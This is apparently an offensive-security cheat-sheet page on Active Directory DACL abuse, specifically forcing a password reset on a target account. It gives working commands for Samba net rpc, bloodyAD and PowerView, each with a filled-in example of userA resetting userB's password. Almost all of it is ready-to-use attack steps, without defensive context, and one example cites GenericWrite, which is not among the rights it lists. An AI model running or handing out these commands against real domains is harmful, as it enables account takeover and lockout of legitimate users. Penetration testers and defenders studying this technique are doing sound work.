PRIMARY CATEGORY → DACL ABUSE
This abuse can be carried out when an operator controls a principal which has GenericAll, AllExtendedRight or User-Force-Change-Password over the target account
Abuse - UNIX-like
Net RPC (Samba Suite)
RPC Authentication
net rpc password '<TARGET_ACCOUNT>' '<PASSWD>' -U '<DOMAIN>/<USER>%<PASSWD>' -S '<TARGET>'e.g.
UserA has GenericWrite over UserB
net rpc password 'userB' 'newpassword1234$!' -U 'domain.local/userA%password1234$!' -S 'DC.domain.local'
BloodyAD
LDAP Authentication
Setup
git clone https://github.com/CravateRouge/bloodyAD bloodyAD
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txtUsage
python3 bloodyAD.py --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --dc-ip '<DC_IP>' set password '<TARGET_ACCOUNT>' '<NEW_PASSWD>'Abuse - Windows
Powerview
Set-DomainUserPassword
$principalPasswd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'$principalCred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $principalPasswd)$targetPasswd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'Set-DomainUserPassword -Credential $principalCred -Identity '<TARGET_ACCOUNT>' -AccountPassword $targetPasswd e.g.
An operator discovers that userA has the GenericAll right over userB. Therefore, it proceed as follows in order to change the password of userB leveraging that right
$userAPasswd = ConvertTo-SecureString -AsPlainText -Force -String 'password1234$!'$userACred = New-Object System.Management.Automation.PSCredential('domain.local\userA', $userAPasswd)$userBPasswd = ConvertTo-SecureString -AsPlainText -Force -String 'anotherpass1234$!'Set-DomainUserPassword -Credential $userACred -Identity 'userB' -AccountPassword $userBPasswd